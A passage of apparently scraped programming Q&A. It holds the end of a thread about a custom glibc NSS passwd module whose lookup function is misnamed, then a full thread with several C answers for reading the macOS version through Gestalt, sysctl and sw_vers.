Init_result is an inline function that simply fills in the result with a dummy user no matter what the PARAMS are.
Now I have my /etc/nsswitch.conf setup as follows:
passwd: myservice compat
And for completeness here is my Makefile.
all:
gcc -fPIC -shared -o libnss_myservice.so.2 -Wl,-soname,libnss_myservice.so.2 myservice.c
install:
sudo install -m 0644 libnss_myservice.so.2 /lib
sudo /sbin/ldconfig -n /lib /usr/lib
clean:
/bin/rf -rf libnss_myservice.so.2
Now after installing this nss module I run getent on the command line and here is my output:
username#host:~/nss$ getent passwd
# _nss_myservice_setpwent
# _nss_myservice_getpwent_r
myuser:mypass:1:1:realname::
root:x:0:0:root:/root:/bin/bash
...
# _nss_myservice_endpwent
So as you can see that is working as I would expect. The iterative call is made which returns the user and then the compat service is called which returns all the user from /etc/passwd.
The problem is when I make this call, "getent passwd myuser", I get a return value of 2, "Key not found in database". This shows me my _nss_myservice_getpwbynam_r function is not being called. Any ideas why? I can provide the complete code if that would help.
You need to call the function _nss_myservice_getpwnam_r instead of _nss_myservice_getpwbynam_r.
After looking at ftp://ftp.acer-euro.com/gpl/Utility/glibc/glibc-2.2.5.tar/include/pwd.h :
#define DECLARE_NSS_PROTOTYPES(service) \
extern enum nss_status _nss_ ## service ## _setpwent (int); \
extern enum nss_status _nss_ ## service ## _endpwent (void); \
extern enum nss_status _nss_ ## service ## _getpwnam_r \ <<< this line
(const char *name, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ## _getpwuid_r \
(uid_t uid, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ##_getpwent_r \
(struct passwd *result, char *buffer, \
size_t buflen, int *errnop);

Getting the OS version in Mac OS X using standard C

I'm trying to get the version of Mac OS X programmatically in C. After searching for a while I tried this code:
#include <CoreServices/CoreServices.h>
int GetOS()
{
SInt32 majorVersion,minorVersion,bugFixVersion;
Gestalt(gestaltSystemVersionMajor, &majorVersion);
Gestalt(gestaltSystemVersionMinor, &minorVersion);
Gestalt(gestaltSystemVersionBugFix, &bugFixVersion);
printf("Running on Mac OS X %d.%d.%d\n",majorVersion,minorVersion,bugFixVersion);
return 0;
}
XCode returns an LD error:
Undefined symbols for architecture x86_64:
"_Gestalt", referenced from:
_GetOS in main.o
What am I missing? How do you do this?
I found also this snippet
[[NSProcessInfo processInfo] operatingSystemVersionString]
But I have no idea how to write that in C.
Did you pass the appropriate framework to GCC in order to enable CoreServices?
% gcc -framework CoreServices -o getos main.c
The code below should work in the foreseeable future for figuring out the current version of Mac Os X.
/* McUsr put this together, and into public domain,
without any guarrantees about anything,
but the statement that it works for me.
*/
#if 1 == 1
#define TESTING
#endif
#include <sys/param.h>
#include <sys/sysctl.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
struct osver {
int minor;
int sub;
} ;
typedef struct osver osxver ;
void macosx_ver(char *darwinversion, osxver *osxversion ) ;
char *osversionString(void) ;
#ifdef TESTING
int main( int argc, char *argv[] )
{
osxver foundver;
char *osverstr= NULL ;
osverstr=osversionString() ;
macosx_ver(osverstr, &foundver ) ;
printf("Mac os x version = 10.%d.%d\n",foundver.minor,foundver.sub );
free(osverstr);
return 0;
}
#endif
char *osversionString(void) {
int mib[2];
size_t len;
char *kernelVersion=NULL;
mib[0] = CTL_KERN;
mib[1] = KERN_OSRELEASE;
if (sysctl(mib, 2, NULL, &len, NULL, 0) < 0 ) {
fprintf(stderr,"%s: Error during sysctl probe call!\n",__PRETTY_FUNCTION__ );
fflush(stdout);
exit(4) ;
}
kernelVersion = malloc(len );
if (kernelVersion == NULL ) {
fprintf(stderr,"%s: Error during malloc!\n",__PRETTY_FUNCTION__ );
fflush(stdout);
exit(4) ;
}
if (sysctl(mib, 2, kernelVersion, &len, NULL, 0) < 0 ) {
fprintf(stderr,"%s: Error during sysctl get verstring call!\n",__PRETTY_FUNCTION__ );
fflush(stdout);
exit(4) ;
}
return kernelVersion ;
}
void macosx_ver(char *darwinversion, osxver *osxversion ) {
/*
From the book Mac Os X and IOS Internals:
In version 10.1.1, Darwin (the core OS) was renumbered from v1.4.1 to 5.1,
and since then has followed the OS X numbers consistently by being four
numbers ahead of the minor version, and aligning its own minor with the
sub-version.
*/
char firstelm[2]= {0,0},secElm[2]={0,0};
if (strlen(darwinversion) < 5 ) {
fprintf(stderr,"%s: %s Can't possibly be a version string. Exiting\n",__PRETTY_FUNCTION__,darwinversion);
fflush(stdout);
exit(2);
}
char *s=darwinversion,*t=firstelm,*curdot=strchr(darwinversion,'.' );
while ( s != curdot )
*t++ = *s++;
t=secElm ;
curdot=strchr(++s,'.' );
while ( s != curdot )
*t++ = *s++;
int maj=0, min=0;
maj= (int)strtol(firstelm, (char **)NULL, 10);
if ( maj == 0 && errno == EINVAL ) {
fprintf(stderr,"%s Error during conversion of version string\n",__PRETTY_FUNCTION__);
fflush(stdout);
exit(4);
}
min=(int)strtol(secElm, (char **)NULL, 10);
if ( min == 0 && errno == EINVAL ) {
fprintf(stderr,"%s: Error during conversion of version string\n",__PRETTY_FUNCTION__);
fflush(stdout);
exit(4);
}
osxversion->minor=maj-4;
osxversion->sub=min;
}
Here is one with "less work", good enough for home projects (statically allocated buffers, ignoring errors). Works for me in OS X 10.11.1.
#include <stdio.h>
/*!
#brief Returns one component of the OS version
#param component 1=major, 2=minor, 3=bugfix
*/
int GetOSVersionComponent(int component) {
char cmd[64] ;
sprintf(
cmd,
"sw_vers -productVersion | awk -F '.' '{print $%d}'",
component
) ;
FILE* stdoutFile = popen(cmd, "r") ;
int answer = 0 ;
if (stdoutFile) {
char buff[16] ;
char *stdout = fgets(buff, sizeof(buff), stdoutFile) ;
pclose(stdoutFile) ;
sscanf(stdout, "%d", &answer) ;
}
return answer ;
}
int main(int argc, const char * argv[]) {
printf(
"Your OS version is: %d.%d.%d\n",
GetOSVersionComponent(1),
GetOSVersionComponent(2),
GetOSVersionComponent(3)
) ;
return 0 ;
}
Using the hint from #uchuugaka in the comment on the answer by #McUsr, I wrote a function that seems to work. I'm not saying it's better than any other answer.
/*
* Structure for MacOS version number
*/
typedef struct macos_version_str
{
ushort major;
ushort minor;
ushort point;
} macos_type;
/****************************************************************************
*
* Determine the MacOS version.
*
* Parameters:
* version_struct: (pointer to) macos_version structure to be filled in.
*
* Return value:
* 0: no error.
*
****************************************************************************/
static int get_macos_version ( macos_type *version_struct )
{
char os_temp [20] = "";
char *os_temp_ptr = os_temp;
size_t os_temp_len = sizeof(os_temp);
size_t os_temp_left = 0;
int rslt = 0;
version_struct->major = 0;
version_struct->minor = 0;
version_struct->point = 0;
rslt = sysctlbyname ( "kern.osproductversion", os_temp, &os_temp_len, NULL, 0 );
if ( rslt != 0 )
{
fprintf ( stderr,
"sysctlbyname() returned %d error (%d): %s",
rslt, errno, strerror(errno));
return ( rslt );
}
os_temp_left = os_temp_len; /* length of string returned */
int temp = atoi ( os_temp_ptr );
version_struct->major = temp;
version_struct->major = atoi ( os_temp_ptr );
while ( os_temp_left > 0 && *os_temp_ptr != '.' )
{
os_temp_left--;
os_temp_ptr++;
}
os_temp_left--;
os_temp_ptr++;
version_struct->minor = atoi ( os_temp_ptr );
while ( os_temp_left > 0 && *os_temp_ptr != '.' )
{
os_temp_left--;
os_temp_ptr++;
}
os_temp_left--;
os_temp_ptr++;
version_struct->point = atoi ( os_temp_ptr );
fprintf ( stderr, "Calculated OS Version: %d.%d.%d", version_struct->major, version_struct->minor, version_struct->point );
if ( version_struct->major == 0 ||
version_struct->minor == 0 ||
version_struct->point == 0 )
{
fprintf ( stderr, "Unable to parse MacOS version string %s", os_temp );
return ( -2 );
}
return 0;
}
If for whatever reason you want to avoid the Gestalt API (which still works fine, but is deprecated), the macosx_deployment_target.c in cctools contains a code snippet that uses the CTL_KERN + KERN_OSRELEASE sysctl(), similar to other answers here.
Here's a small program adapted from that code and taking macOS 11 and newer (tested and verified with up to macOS 12.6, which was at time of updating this post the latest stable release) into account:
#include <stdio.h>
#include <sys/sysctl.h>
int main()
{
char osversion[32];
size_t osversion_len = sizeof(osversion) - 1;
int osversion_name[] = { CTL_KERN, KERN_OSRELEASE };
if (sysctl(osversion_name, 2, osversion, &osversion_len, NULL, 0) == -1) {
printf("sysctl() failed\n");
return 1;
}
uint32_t major, minor;
if (sscanf(osversion, "%u.%u", &major, &minor) != 2) {
printf("sscanf() failed\n");
return 1;
}
if (major >= 20) {
major -= 9;
// macOS 11 and newer
printf("%u.%u\n", major, minor);
} else {
major -= 4;
// macOS 10.1.1 and newer
printf("10.%u.%u\n", major, minor);
}
return 0;
}

Resources